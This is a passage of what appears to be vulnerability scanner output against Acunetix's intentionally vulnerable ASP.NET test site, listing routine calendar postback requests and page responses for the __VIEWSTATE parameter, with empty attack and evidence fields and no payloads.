style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,169 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8349&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgAAv4KuwtoIZGRkgtcioPyXInoNQipXw6wtCoDBl7U%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLM6ZyuDQLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA%2FXci0AFEnY8PlI72i2Bk%2BPFnM2H
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:08:44 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgAAv4KuwtoIZGRkgtcioPyXInoNQipXw6wtCoDBl7U=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLM6ZyuDQLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA/Xci0AFEnY8PlI72i2Bk+PFnM2H" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:White" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,169 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8353&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgAAZizTxdoIZGRk23BmIk6YRJr7QHtvQOW7UTlnWAg%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLlkY2YDwLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA8C1JWe5%2FoxIsdkxsXo%2FKBMHx1tC
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:20:24 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgAAZizTxdoIZGRk23BmIk6YRJr7QHtvQOW7UTlnWAg=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLlkY2YDwLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA8C1JWe5/oxIsdkxsXo/KBMHx1tC" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:White" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> 